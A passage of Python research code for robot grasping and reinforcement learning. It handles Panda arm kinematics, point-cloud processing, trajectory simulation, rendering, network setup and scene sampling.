if renderer is None : from OMG.ycb_render.ycb_renderer import YCBRenderer width, height = 640, 480 renderer = YCBRenderer(width=width, height=height, offset=offset, gpu_id=0) if not large_fov: renderer.set_projection_matrix(width, height, width * 0.8, width * 0.8, width / 2, height / 2, 0.1, 6) renderer.set_camera_default() else: renderer.set_fov(90) models = ["link1", "link2", "link3", "link4", "link5", "link6", "link7", "hand", "finger", "finger"] 
obj_paths = ["data/robots/{}.DAE".format(item) for item in models] renderer.load_objects(obj_paths) robot = require_robot() return renderer, robot def truncated_normal(tensor, mean=0, std=1, trunc_std=2): size = tensor.shape tmp = tensor.new_empty(size + (8,)).normal_() # 4 valid = (tmp < trunc_std) & (tmp > -trunc_std) ind = valid.max(-1, keepdim=True)[1] tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1)) tensor.data.mul_(std).add_(mean) return tensor def sample_gaussian(size, truncate_std=None, device=None): y = torch.randn(*size).float() y = y if device is None else y.to(device) if truncate_std is not None: truncated_normal(y, mean=0, std=1, trunc_std=truncate_std) return y def vis_network_input(xyz, xyz_features): for i in range(len(xyzs)): renderer, _ = require_renderer() vis_point(renderer, xyz_features[i], interact=2) def get_usage(): GPUs = GPUtil.getGPUs() memory_usage = psutil.virtual_memory().percent gpu_usage = max([GPU.memoryUsed for GPU in GPUs]) return gpu_usage, memory_usage def solve_ik(joints, pose): """ For simulating trajectory """ ik = robot.inverse_kinematics_trac_ik(pose[:3], ros_quat(pose[3:]), seed=joints[:7]) if ik is not None: joints = np.append(np.array(ik), [0, 0.04, 0.04]) return joints def bullet_ik(pandas, joints, poses, panda_clients): # simulate target_joints = [] for panda, joint, p_client, pose in zip(pandas, joints, panda_clients, poses): panda.reset(np.array(joint).flatten()) pos, orn = pose[:3], ros_quat(pose[3:]) target_joints.append(np.array(p_client.calculateInverseKinematics(panda.pandaUid, panda.pandaEndEffectorIndex, pos, orn))) return np.stack(target_joints, axis=0) def generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num=1, vis=False, gaddpg=False): """ use the current point cloud and bullet kinemetics to simulate observation and action for a trajectory extract the stored plan in the dataset for plan encoding param: 4 x N, 9 """ MAX_CLIENT_NUM = max(agent.test_traj_num, 8) 
pandas, panda_clients = require_panda(MAX_CLIENT_NUM) num = len(point_state) if num > 1: init_joints = joints[0].flatten() total_step = int(remain_timestep[0]) else: init_joints = joints.flatten() total_step = remain_timestep pandas = pandas[:num] panda_clients = panda_clients[:num] ef_pose = [] for panda, p_client in zip(pandas, panda_clients): panda.reset(joints=init_joints.flatten()) pos, orn = p_client.getLinkState(panda.pandaUid, panda.pandaEndEffectorIndex)[:2] ef_pose.append(unpack_pose(list(pos) + [orn[3], orn[0], orn[1], orn[2]])) ef_pose = np.stack(ef_pose, axis=0) sim_point_state = point_state[0] if len(point_state.shape) == 3 and point_state.shape[0] == 1 else point_state sim_pose = np.stack([np.eye(4)] * num, axis=0) plan, sim_states, sim_joints, sim_actions, sim_poses = [], [], [], [], [sim_pose] agent.train_traj_feature = False # avoid regenerating traj latent # rollout step_func = agent.batch_select_action if num > 1 else agent.select_action if has_check(agent, 'vis_traj') and hasattr(agent, 'gaddpg') and gaddpg: step_func = agent.gaddpg_step # for episode_steps in range(total_step): state = [[sim_point_state, np.zeros(1)], None, None, None] action, _, _, aux_pred = step_func(state, remain_timestep=remain_timestep - episode_steps, curr_joint=joints ) if len(action.shape) == 1: action = action[None] action_pose = unpack_action_batch(action) ef_pose = np.matmul(ef_pose, action_pose) # joints joints = bullet_ik(pandas, joints, pack_pose_batch(ef_pose), panda_clients) sim_point_state = se3_transform_pc(se3_inverse_batch(action_pose), sim_point_state) plan.append(joints) sim_actions.append(action) sim_states.append(sim_point_state) sim_poses.append(np.matmul(sim_poses[-1], action_pose)) sim_joints.append(joints) sim_poses = list(pack_pose_rot_first_batch(np.concatenate(sim_poses, axis=0)).reshape(-1, num, 7).transpose((1,0,2))) agent.train_traj_feature = True sim_integer_time = np.arange(total_step, 0, -1) traj_time_batch = sim_integer_time[::-1] / 
float(total_step) return sim_poses, traj_time_batch, sim_joints, sim_states, sim_integer_time def generate_simulated_expert_trajectory(state, plan, curr_joint, curr_traj_time=0, idx=0, vis=False,robot=None): """ use the current point cloud to simulate observation and action for a trajectory extract the stored plan in the dataset for plan encoding param: 4 x N, T x 9, 9 """ arm_collision_point = get_collision_points() if robot is None: robot = require_robot() curr_ef_pose = (robot.forward_kinematics_parallel(wrap_value(curr_joint)[None], offset=False)[0][7]) global_pc = np.matmul(curr_ef_pose[:3, :3], state[:3, :-500]) + curr_ef_pose[:3, [3]] pc_mask = state[[3]] max_len = len(plan) traj_len = plan_length(plan) plan = plan[:traj_len] if traj_len == 0: return (state[None], plan, np.zeros(6)[None], pack_pose_rot_first(np.eye(4))[None], pack_pose_rot_first(np.eye(4))[None], [1.], [[idx, 0, curr_traj_time]]) plan_link_poses = robot.forward_kinematics_parallel(wrap_values(plan), offset=False) sim_poses = pack_pose_rot_first_batch(np.matmul(se3_inverse(curr_ef_pose)[None], plan_link_poses[:, 7])) sim_goals = pack_pose_rot_first_batch(np.matmul(se3_inverse_batch(\ np.concatenate((curr_ef_pose[None], plan_link_poses[:, 7]), axis=0)), plan_link_poses[-1, 7][None])) # not used inv_ef_pose = se3_inverse_batch(plan_link_poses[:, 7]) sim_states = np.matmul(inv_ef_pose[:, :3, :3], global_pc[None]) + inv_ef_pose[:, :3, [3]] plan_link_poses = np.matmul(inv_ef_pose[:, None], plan_link_poses) collision_point = np.matmul(plan_link_poses[...,:3,:3], arm_collision_point.swapaxes(-1, -2)[:,:3]).swapaxes(-1, -2) + \ plan_link_poses[...,:3,[3]].swapaxes(-1, -2) collision_point = collision_point.reshape([len(plan_link_poses), -1, 3]).swapaxes(-1, -2) sim_states = np.concatenate((sim_states, collision_point), axis=-1) # robot points sim_states = np.concatenate((sim_states, np.tile(pc_mask[None], (len(sim_states), 1, 1))), axis=1) # mask sim_joints = np.concatenate((curr_joint[None], plan), 
axis=0) sim_actions = np.zeros([len(sim_joints) - 1, 6]) # not used sim_traj_idx = [[idx, j / float(traj_len), curr_traj_time + (j + 1) / max_len] for j in range(traj_len + 1)] sim_states = np.concatenate((state[None], sim_states),axis=0) # plan = np.concatenate((curr_joint[None], plan),axis=0) # sim_poses = np.concatenate((pack_pose_rot_first(np.eye(4))[None], sim_poses),axis=0) sim_actions = np.concatenate((sim_actions, np.zeros(6)[None]),axis=0) sim_integer_time = np.arange(traj_len + 1, 0, -1) return (sim_states, plan, sim_actions, sim_poses, sim_goals, sim_integer_time, sim_traj_idx) def vis_learner_traj(state, joints, agent, remain_timestep): """ visualize rollout using the current traj_feat """ remain_timestep = min(remain_timestep, 45) point_state = state[0][0][None] poses = robot.forward_kinematics_parallel(wrap_value(joints)[None], offset=False)[0] ef_pose = poses[7] packed_poses = [pack_pose(pose) for pose in poses] sampler_multi_traj = len(agent.traj_feat_target_test) > 1 # make copy traj_feat_copy = agent.traj_feat.clone() agent.traj_feat = agent.traj_feat_target_test # restore sampler latent max_traj_num = 1 if sampler_multi_traj: max_traj_num = agent.test_traj_num joints = np.tile(joints, (max_traj_num, 1)) point_state = np.tile(point_state, (max_traj_num, 1, 1)) remain_timestep = torch.ones(max_traj_num).cuda() * remain_timestep vis_traj = generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num)[0] traj_lines = [] hues = np.linspace(0., 5./6, max_traj_num ) colors = np.stack([colorsys.hsv_to_rgb(hue, 1.0, 1.0) for hue in hues]) * 255 lines_color = (np.repeat(colors, 2, axis=0).astype(np.int)).tolist() for i in range(max_traj_num): traj_lines.extend(gripper_traj_lines(ef_pose, vis_traj[i])) lines = traj_lines else: vis_traj = generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num)[0] traj_line, grasp_line = gripper_traj_lines(ef_pose, vis_traj[0]) lines = [(traj_line[0], 
traj_line[1]), (grasp_line[0], grasp_line[1])] lines_color = [[0, 0, 255], [0, 0, 255]] vis_point_state = state[0][0] vis_point_state = vis_point_state[:, 6:] # avoid hand point collision target_mask = get_target_mask(vis_point_state) point_color = get_point_color(vis_point_state) vis_point_state = se3_transform_pc(ef_pose, vis_point_state) # base coordinate renderer = require_renderer()[0] renderer.vis(packed_poses, range(len(poses)), shifted_pose=np.eye(4), interact=2, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [vis_point_state[:3]], "project_color": [point_color], "point_size": [3], "reset_line_point": True, "static_buffer": True, "line": lines, "line_color": lines_color, } ) agent.traj_feat = traj_feat_copy def joint_to_cartesian(new_joints, curr_joint): """ Convert joint space action to task space action by fk """ r = require_robot() ef_pose = r.forward_kinematics_parallel(wrap_value(curr_joint)[None], offset=False)[0][-3] ef_pose_ = r.forward_kinematics_parallel(wrap_value(new_joints)[None], offset=False)[0][-3] rel_pose = se3_inverse(ef_pose).dot(ef_pose_) action = np.hstack([rel_pose[:3,3], mat2euler(rel_pose[:3,:3])]) return action def check_ngc(): """ check for using cluster in training """ GPUs = GPUtil.getGPUs() gpu_limit = max([GPU.memoryTotal for GPU in GPUs]) return (gpu_limit > 14000) def plan_length(plan): if len(plan) == 0: return plan if type(plan) is np.ndarray: return np.sum(np.abs(plan).sum(-1) > 0) else: return torch.sum(torch.abs(plan).sum(-1) > 0) def pad_traj_plan(plan, max_len=50): padded_plan = np.zeros((max_len, 9)) if len(plan) == 0: return padded_plan padded_plan[:len(plan)] = plan return padded_plan def update_net_args(config, spec, net_args): net_args["model_scale"] = config.feature_input_dim / 512. 
net_args["group_norm"] = True if has_check(config, 'sa_channel_concat'): spec["net_kwargs"]["action_concat"] = True if has_check(config, 'joint_point_state_input'): net_args["extra_latent"] += 7 if has_check(config, 'feature_option'): net_args["feature_option"] = config.feature_option if has_check(config, 'value_overwrite_lr') and config.value_overwrite_lr > 0: spec["opt_kwargs"]["lr"] = config.value_overwrite_lr def update_traj_net_args(config, spec, net_args): net_args["feature_extractor_class"] = config.traj_feature_extractor_class net_args["num_inputs"] = config.traj_latent_size net_args["hidden_dim"] = config.feature_input_dim net_args["feat_head_dim"] = config.traj_latent_size net_args["config"] = config net_args["model_scale"] = config.traj_latent_size / 512. net_args["feature_option"] = config.st_feature_option net_args["group_norm"] = True spec["opt_kwargs"]["lr"] = config.traj_net_lr net_args["extra_latent"] += 7 def update_traj_sampler_net_args(config, spec, net_args): net_args["num_inputs"] = config.traj_latent_size net_args["hidden_dim"] = config.feature_input_dim net_args["feat_head_dim"] = config.traj_latent_size net_args["config"] = config net_args["output_model_scale"] = config.traj_latent_size / 512. net_args["model_scale"] = config.traj_sampler_latent_size / 512. 
net_args["feature_option"] = config.traj_feature_option net_args["group_norm"] = True net_args["extra_latent"] += 7 # joint spec["opt_kwargs"]["lr"] = config.traj_sampler_net_lr if config.sampler_extra_abs_time: net_args["extra_latent"] += 1 # time def make_nets_opts_schedulers(model_spec, config, cuda_device="cuda"): specs = yaml.load(open(model_spec).read(), Loader=yaml.SafeLoader) # ret = {} if torch.cuda.device_count() > 1: print("Let's use", torch.cuda.device_count(), "GPUs!") for net_name, spec in specs.items(): net_args = spec.get("net_kwargs", {}) if net_name == "state_feature_extractor": if has_check(config, 'state_feature_extractor'): spec["class"] = config.state_feature_extractor net_args["input_dim"] = config.channel_num update_net_args(config, spec, net_args) if net_name == 'traj_feature_extractor': if has_check(config, 'train_traj_feature'): net_args["input_dim"] = config.channel_num update_traj_net_args(config, spec, net_args) else: continue if net_name == 'traj_feature_sampler': if has_check(config, 'train_traj_sampler') : net_args["input_dim"] = config.channel_num update_traj_sampler_net_args(config, spec, net_args) else: continue print('net_name:', net_name) net_class = getattr(core.networks, spec["class"]) net = net_class(**net_args) net = torch.nn.DataParallel(net).to("cuda") d = { "net": net, } if "opt" in spec: d["opt"] = getattr(optim, spec["opt"])( net.parameters(), **spec["opt_kwargs"] ) if len(config.overwrite_feat_milestone) > 0: spec["scheduler_kwargs"]["milestones"] = config.overwrite_feat_milestone print("schedule:", spec["scheduler_kwargs"]["milestones"]) d["scheduler"] = getattr(optim.lr_scheduler, spec["scheduler"])( d["opt"], **spec["scheduler_kwargs"] ) if hasattr(net.module, "encoder"): d["encoder_opt"] = getattr(optim, spec["opt"])( net.module.encoder.parameters(), **spec["opt_kwargs"] ) d["encoder_scheduler"] = getattr(optim.lr_scheduler, spec["scheduler"])( d["encoder_opt"], **spec["scheduler_kwargs"] ) if hasattr(net.module, 
"value_encoder"): d["val_encoder_opt"] = getattr(optim, spec["opt"])( net.module.value_encoder.parameters(), **spec["opt_kwargs"] ) d["val_encoder_scheduler"] = getattr( optim.lr_scheduler, spec["scheduler"] )(d["val_encoder_opt"], **spec["scheduler_kwargs"]) ret[net_name] = d return ret def get_fc_feat_head(input_dim, dim_list, output_dim, acti_func='nn.ReLU', end_with_act=False): model_list = [nn.Linear(input_dim, dim_list[0]), nn.ReLU(True)] for i in range(1, len(dim_list)): model_list.extend([nn.Linear(dim_list[i-1], dim_list[i]), eval(acti_func)(True)]) model_list.append(nn.Linear(dim_list[-1], output_dim)) if end_with_act: model_list.append(eval(acti_func)(True)) return nn.Sequential(*model_list) def get_info(state, opt="img", IMG_SIZE=(112, 112)): if opt == "img": return (state[0][1][:3].T * 255).astype(np.uint8) if opt == "intr": cam_proj = np.array(state[-2][48:]).reshape([4, 4]) return projection_to_intrinsics(cam_proj, IMG_SIZE[0], IMG_SIZE[1])[:3, :3] if opt == "point": return state[0][0] def get_collision_points(): """ load collision points with the order of the link list and end effector """ global robot_points if robot_points is None: collision_file = 'data/robots/all_collision_pts.npy' if not os.path.exists(collision_file): collision_pts = [] links = [ "link1", "link2", "link3", "link4", "link5", "link6", "link7", "hand", "finger", "finger", ] for i in range(len(links)): file = "data/robots/{}.xyz".format(links[i]) pts = np.loadtxt(file) sample_pts = pts[random.sample(range(pts.shape[0]), 50)] collision_pts.append(sample_pts) collision_pts = np.array(collision_pts) np.save(collision_file, collision_pts) else: collision_pts = np.load(collision_file) robot_points = collision_pts return robot_points def sample_latent(batch_size, latent_size): return torch.randn(batch_size, latent_size).cuda() def add_extra_text(img, extra_text, text_size=0.3, corner='tl'): img = img.copy() img_ratio = img.shape[0] / 256 gap = int(15 * img_ratio) width, height = 
img.shape[:2] offset_h = 0 if corner.startswith('t') else height - int(50 * img_ratio) offset_w = 0 if corner.endswith('l') else int(width - 30 * img_ratio) sign = 1 if corner.startswith('t') else -1 text_size = 0.3 * img_ratio for i, t in enumerate(extra_text): # cv2.putText( img, t, (offset_w, offset_h + sign * (gap + i * gap)), cv2.FONT_HERSHEY_DUPLEX, text_size, [255,0,0] ) # 0.7 return img def write_video( traj, scene_file, overhead_traj=None, expert_traj=None, overhead_expert_traj=None, name=0, IMG_SIZE=(112, 112), output_dir="output_misc/", logdir="policy", target_name="", surfix="", use_pred_grasp=False, success=False, use_value=False, extra_text=None ): ratio = 1 if expert_traj is None else 2 result = "success" if success else "failure" video_writer = make_video_writer( os.path.join( output_dir, "rl_output_video_{}/{}_rollout.avi".format(surfix, scene_file), ), int(ratio * IMG_SIZE[0]), int(IMG_SIZE[1]), ) text_color = [255, 0, 0] if use_pred_grasp else [0, 255, 0] for i in range(len(traj)): img = traj[i][..., [2, 1, 0]] if expert_traj is not None: idx = min(len(expert_traj) - 1, i) img = np.concatenate((img, expert_traj[idx][..., [2, 1, 0]]), axis=1) img = img.astype(np.uint8) if extra_text is not None: img = add_extra_text(img, extra_text) video_writer.write(img) if overhead_traj is not None: width, height = overhead_traj[0].shape[1], overhead_traj[0].shape[0] overhead_video_writer = make_video_writer( os.path.join( output_dir, "rl_output_video_{}/{}_overhead_rollout.avi".format(surfix, scene_file)), int(ratio * width), height ) for i in range(len(overhead_traj)): img = overhead_traj[i][..., [2, 1, 0]] if overhead_expert_traj is not None: idx = min(len(overhead_expert_traj) - 1, i) img = np.concatenate((img, overhead_expert_traj[idx][..., [2, 1, 0]]), axis=1) overhead_video_writer.write(img.astype(np.uint8)) def append_pointcloud_time(agent, point_state, time_batch=None, traj=True, train=True): if not train: if not hasattr(agent, 'timestep'): 
traj_integer_time_batch = torch.Tensor([0]).float().cuda() else: traj_integer_time_batch = agent.timestep else: traj_integer_time_batch = time_batch if agent.sampler_extra_abs_time: traj_time_batch = traj_integer_time_batch.view(-1,1,1).expand(-1, -1, point_state.shape[2]) point_state = torch.cat((point_state, traj_time_batch), dim=1) return point_state def preprocess_points(config, state_input, curr_joint, time_batch=None, traj=False, append_pc_time=False): """ process point cloud for network input """ if type(curr_joint) is not torch.Tensor: curr_joint = torch.from_numpy(curr_joint).cuda().float() if type(state_input) is not torch.Tensor: state_input = torch.from_numpy(state_input).cuda().float() state_input_batch = state_input.clone() curr_joint = curr_joint[:, :7] if state_input_batch.shape[-1] > 4500: # robot point included state_input_batch = remove_robot_pt(state_input_batch) if (not traj and has_check(config, 'joint_point_state_input')) or \ (traj and has_check(config, 'traj_joint_point_state_input')): curr_joint_bc = curr_joint[...,None].expand(-1, -1, state_input_batch.shape[-1]) state_input_batch = torch.cat((state_input_batch, curr_joint_bc), dim=1) if append_pc_time and hasattr(config, 'test_mode'): state_input_batch = append_pointcloud_time(config, state_input_batch, time_batch, False, not config.test_mode) return state_input_batch def get_point_color(vis_points): tgt_mask = get_target_mask(vis_points) obs_mask = get_obs_mask(vis_points) near_obs_mask = get_near_obs_mask(vis_points) rob_mask = get_robot_mask(vis_points) target_color = [0, 255, 0] obs_color = [255, 0, 0] rob_color = [0, 0, 255] near_obs_color = [255, 0, 0] pt_color = np.zeros_like(vis_points[:3]).T pt_color[tgt_mask] = target_color pt_color[obs_mask] = obs_color pt_color[rob_mask] = rob_color pt_color[near_obs_mask] = near_obs_color return pt_color def sample_ef(target, near=0.2, far=0.50): # sample a camera extrinsics count = 0 ik = None outer_loop_num = 20 inner_loop_num = 5 robot = 
require_robot() for _ in range(outer_loop_num): theta = np.random.uniform(low=0, high=1*np.pi/2) phi = np.random.uniform(low=np.pi/2, high=3*np.pi/2) # half sphere r = np.random.uniform(low=near, high=far) # sphere radius pos = np.array([r*np.sin(theta)*np.cos(phi), r*np.sin(theta)*np.sin(phi), r*np.cos(theta)]) trans = pos + target + np.random.uniform(-0.03, 0.03, 3) trans[2] = np.clip(trans[2], 0.2, 0.6) trans[1] = np.clip(trans[1], -0.3, 0.3) trans[0] = np.clip(trans[0], 0.0, 0.5) pos = trans - target for i in range(inner_loop_num): rand_up = np.array([0, 0, -1]) rand_up = rand_up / np.linalg.norm(rand_up) R = inv_lookat(pos, 2 * pos, rand_up).dot(rotZ(-np.pi/2)[:3, :3]) quat = ros_quat(mat2quat(R)) ik = robot.inverse_kinematics(trans, quat, seed=anchor_seeds[np.random.randint(len(anchor_seeds))]) if ik is not None: break return ik def gripper_traj_lines(start_pose, traj_state, joint_output=False, gripper_along=False ): ef_lines = [] gripper_lines = [np.zeros([3, 0]), np.zeros([3, 0])] draw_gripper_traj_line = gripper_along if joint_output: r = require_robot() curr_joint = np.concatenate((traj_state, 0.04 * np.ones((len(traj_state), 2))), axis=-1) traj_state = r.forward_kinematics_parallel(wrap_values(curr_joint ), offset=False)[:, 7] for grasp_idx, grasp in enumerate(traj_state): if not joint_output: if grasp_idx == 0: grasp = np.eye(4) elif len(grasp) == 6: grasp = unpack_pose_euler(grasp) else: grasp = unpack_pose_rot_first(grasp) grasp_pose = start_pose.dot(grasp) line_starts, line_ends = grasp_gripper_lines(grasp_pose[None]) gripper_lines[0] = np.concatenate((gripper_lines[0], line_starts[0]), axis=-1) gripper_lines[1] = np.concatenate((gripper_lines[1], line_ends[0]), axis=-1) ef_lines.append(grasp_pose[:3, 3]) if not draw_gripper_traj_line: gripper_lines[0] = gripper_lines[0][:,-5:] gripper_lines[1] = gripper_lines[1][:,-5:] if len(ef_lines) > 1: ef_lines = [[ef_lines[idx], ef_lines[idx+1]] for idx in range(len(ef_lines) - 1)] ef_lines = 
np.array(ef_lines) ef_lines = [ef_lines.T[:, 0], ef_lines.T[:, 1]] else: ef_lines = [] return [gripper_lines, ef_lines] def vis_traj(point, curr_joint, traj_state=None, V=cam_V, interact=2, used_renderer=None, gripper_along=False): # visualize traj with renderer renderer, robot = require_renderer( ) if type(point) is torch.Tensor: point = point.detach().cpu().numpy() point = point[0] if point.shape(1) != 4096: point = point[:,6:-500] # remove gripper and robot point if type(curr_joint) is torch.Tensor: curr_joint = curr_joint.detach().cpu().numpy() if len(curr_joint) == 7: curr_joint = np.append(curr_joint, [0, 0]) poses_ = robot.forward_kinematics_parallel(wrap_value(curr_joint), offset=False)[0] poses_2 = [pack_pose(pose) for pose in poses_] point_color = get_point_color(point) point = se3_transform_pc(poses_[7], point) if traj_state is not None: if type(traj_state) is torch.Tensor: traj_state = traj_state.detach().cpu().numpy() if type(traj_state) is list and len(traj_state) > 4: traj_lines = [] line_colors = get_mask_colors(len(traj_state) * 2 + 5)[5:] for i in range(len(traj_state)): traj_lines.extend(gripper_traj_lines(poses_[7], traj_state[i])) else: gripper_lines, ef_lines = gripper_traj_lines(poses_[7], traj_state, gripper_along=gripper_along) line_colors = [[255, 255, 0], [0, 0, 255]] traj_lines = [gripper_lines, ef_lines] rgb = renderer.vis(poses_2, list(range(10)), shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [point[:3]], "project_color": [point_color], "static_buffer": True, "reset_line_point": True, "line": traj_lines, "line_color": line_colors, } ) else: rgb = renderer.vis(poses_2, list(range(10)), shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [point[:3]], "project_color": [point_color], "static_buffer": True, "reset_line_point": True, "thickness": [2] } ) return rgb def vis_point(renderer, point_state, 
window_name='test', interact=1, curr_joint=None, grasp=None, V=None): """visualize single point state """ if type(point_state) is torch.Tensor: point_state = point_state.detach().cpu().numpy() vis_points = point_state.copy() pt_color = get_point_color(vis_points) if V is None: V = [[ 0.3021, 0.668, 0.6801, 0. ], [-0.7739, -0.2447, 0.5841, 0. ], [ 0.5566, -0.7028, 0.4431, 1.1434], [ 0., 0., 0., 1. ]] line, line_color = [], [] cls_indexes, poses = [], [] if grasp is not None: line_starts, line_ends = grasp_gripper_lines(unpack_pose_rot_first(grasp.detach().cpu().numpy())[None]) line = [(line_starts[0], line_ends[0])] line_color = [[255, 255, 0]] return renderer.vis( poses, cls_indexes, shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [vis_points[:3] ], "project_color": [pt_color], "point_size": [3], "reset_line_point": True, "static_buffer": True, "line": line, "line_color": line_color, } ) def compose_state_traj(data_list, CONFIG, step=0): """downsampling traj """ downsample_length = (len(data_list[0]) - step) // int(CONFIG.sparsify_traj_ratio) idx = list(np.linspace(step, len(data_list[0]) - 1, downsample_length).astype(np.int)) torch_data_list = [] for data_idx, data in enumerate(data_list): torch_data_list.append(torch.from_numpy(np.stack([data[i] for i in idx], axis=0)).cuda().float()) return torch_data_list def update_expert_traj(agent, expert_data_list, cfg, step=0, remote=False): """ compute expert traj latent embedding """ expert_exec_traj = compose_state_traj(expert_data_list, cfg.RL_TRAIN, step) if remote: recons_traj = agent.select_traj.remote(None, expert_data_list[0][step][None], None, vis=False, remain_timestep=cfg.RL_MAX_STEP, curr_joint=expert_data_list[1][step][None], gt_traj=expert_exec_traj) # generate the traj latent else: recons_traj = agent.select_traj(None, expert_data_list[0][step][None], None, vis=False, remain_timestep=cfg.RL_MAX_STEP, 
curr_joint=expert_data_list[1][step][None], gt_traj=expert_exec_traj) # generate the traj latent return expert_exec_traj, recons_traj, expert_exec_traj[3].detach().cpu().numpy() def get_gaddpg(path=None, load_joint_trained_model=False): """ get pretrained GA-DDPG Models """ from core.ddpg import DDPG gaddpg_dict = edict() gaddpg_dict = edict(yaml.load(open("output/demo_model/config.yaml", "r"))) net_dict = make_nets_opts_schedulers(gaddpg_dict.RL_MODEL_SPEC, gaddpg_dict.RL_TRAIN) gaddpg = DDPG(512, PandaTaskSpace6D(), gaddpg_dict.RL_TRAIN) gaddpg.setup_feature_extractor(net_dict, True) gaddpg.load_model('output/demo_model') gaddpg.set_mode(True) return gaddpg def proj_point_img(img, K, offset_pose, points=None, color=(255, 0, 0), vis=False, neg_y=True, traj=None, joint_output=False, last_joint=None, remain_timestep=-1, gt_goal=None, traj_offset_pose=None, extra_text=None, model_name=None, vis_traj_gradient_color=False): # draw traj lines, goal / actions predictions and texts in image plane target_mask = get_target_mask(points) obs_mask = get_obs_mask(points) robot_mask = get_robot_mask(points) colors = [[0, 255, 0], [255, 0, 0], [0, 0, 255]] img = img.copy() # point first for i, mask in enumerate([target_mask, obs_mask, robot_mask]): points_i = points[:, mask] points_xyz = points_i[:3] xyz_points = offset_pose[:3, :3].dot(points_xyz) + offset_pose[:3, [3]] if neg_y: xyz_points[:2] *= -1 x, y, valid_idx_mask = valid_3d_to_2d(K, xyz_points, img) img[y[valid_idx_mask], x[valid_idx_mask]] = colors[i] if traj_offset_pose is None: traj_offset_pose = offset_pose if traj is not None and traj[0] is not None: if (remain_timestep == -1 or len(traj) == remain_timestep) and type(traj) is not list: line_colors = [[255, 255, 0], [0, 255, 255]] traj_lines = gripper_traj_lines(traj_offset_pose, traj, joint_output) else: if type(traj) is list: traj_num = len(traj) remain_timestep = len(traj[0]) traj[0] = traj[0][:,:7] traj = np.concatenate(traj, axis=0) else: traj_num = 
int(len(traj) / remain_timestep) remain_timestep = int(remain_timestep) traj_lines = [] hues = np.linspace(0., 5./6, traj_num ) colors = np.stack([colorsys.hsv_to_rgb(hue, 1.0, 1.0) for hue in hues]) * 255 line_colors = np.repeat(colors, 2, axis=0) for i in range(traj_num): traj_lines.extend(gripper_traj_lines(traj_offset_pose, traj[i*remain_timestep:(i+1)*remain_timestep ] )) for line_i, lines in enumerate(traj_lines): lines = np.array(lines) if len(lines) == 0: continue if neg_y: lines[:, :2] *= -1 p_xyz = np.matmul(K, lines) x, y = (p_xyz[:,0] / p_xyz[:,2]).astype(np.int), (p_xyz[:,1] / p_xyz[:,2]).astype(np.int) x = np.clip(x, 0, img.shape[0] - 1) y = np.clip(y, 0, img.shape[1] - 1) for i in range(x.shape[1]): # avoid clipping issues color = line_colors[line_i] color = (int(color[0]), int(color[1]), int(color[2])) if np.abs(x[0, i] - x[1, i]) > 100 or np.abs(y[0, i] - y[1, i]) > 100: continue if line_i == 1 and len(traj_lines) > 4 and not vis_traj_gradient_color: cv2.line(img, (x[0, i], y[0, i]), (x[1, i], y[1, i]), color, 2) else: cv2.line(img, (x[0, i], y[0, i]), (x[1, i], y[1, i]), color, 1) if extra_text is not None: img = add_extra_text(img, extra_text, 1.5) # 0.7 return img def draw_grasp_img(img, pose, K, offset_pose, color=(0, 0, 255), vis=False, neg=True ): img_cpy = img.copy() line_index = [[0, 1, 1, 2, 3], [1, 2, 3, 4, 5]] hand_anchor_points = grasp_points_from_pose(pose, offset_pose) if neg: hand_anchor_points[:2] *= -1 p_xyz = K.dot(hand_anchor_points) x, y = (p_xyz[0] / p_xyz[2]).astype(np.int), (p_xyz[1] / p_xyz[2]).astype(np.int) x = np.clip(x, 0, img.shape[0] - 1) y = np.clip(y, 0, img.shape[1] - 1) for i in range(len(line_index[0])): pt1 = (x[line_index[0][i]], y[line_index[0][i]]) pt2 = (x[line_index[1][i]], y[line_index[1][i]]) cv2.line(img_cpy, pt1, pt2, color, 2) return img_cpy def remove_robot_pt(points): return points[..., :-500] def reparameterize(mu, logsigma, truncated=True, fix_eps=None): std = torch.exp(logsigma) if truncated: eps = 
sample_gaussian(std.shape, truncate_std=2.).cuda() else: eps = torch.randn_like(std) if fix_eps is not None: eps = fix_eps return mu + eps * std def has_check(x, prop): return hasattr(x, prop) and getattr(x, prop) def check_scene(env, state=None, start_rot=None, object_performance=None, planner=None, scene_name=None, run_iter=0, check_ik=False, CONFIG=None, load_test_scene=False): """ check if a scene is valid by its distance, view, hand direction, target object state, and object counts """ if load_test_scene : return name_check(env, object_performance, run_iter) MAX_TEST_PER_OBJ = CONFIG.max_test_per_obj pose_flag = pose_check(env, state, start_rot, CONFIG) name_flag = name_check(env, object_performance, run_iter, MAX_TEST_PER_OBJ) collision_flag = not env.collided check_flag = pose_flag and name_flag and collision_flag if check_flag and check_ik: goal_validity = planner.expert_plan(return_success=True, check_scene=True) if not goal_validity: return False return check_flag def sample_scene(env, planner, object_performance=None, scene_file=None, run_iter=0, CONFIG=None, timeout=6.): """ sample scenes with ik filtering """ state = None MAX_TEST_PER_OBJ = CONFIG.max_test_per_obj start_time = time.time() outer_cnt, inner_cnt = CONFIG.scene_sample_check_ik_cnt, CONFIG.scene_sample_inner_cnt if CONFIG.index_file == 'filter_shapenet.json': inner_cnt *= 3 for _ in range(outer_cnt): for _ in range(inner_cnt): if time.time() - start_time > timeout: return state, False flag = not test_cnt_check(env, object_performance, run_iter, MAX_TEST_PER_OBJ) if flag: break state = env.reset( scene_file=None, init_joints=rand_sample_joint(env, None, CONFIG.ENV_NEAR, CONFIG.ENV_FAR), reset_free=True, enforce_face_target=True ) cur_ef_pose = env._get_ef_pose(mat=True) flag = check_scene(env, state, cur_ef_pose[:3, :3], object_performance, planner, scene_file, run_iter, False, CONFIG) if flag: break if flag and check_scene(env, state, cur_ef_pose[:3, :3], object_performance, planner, 
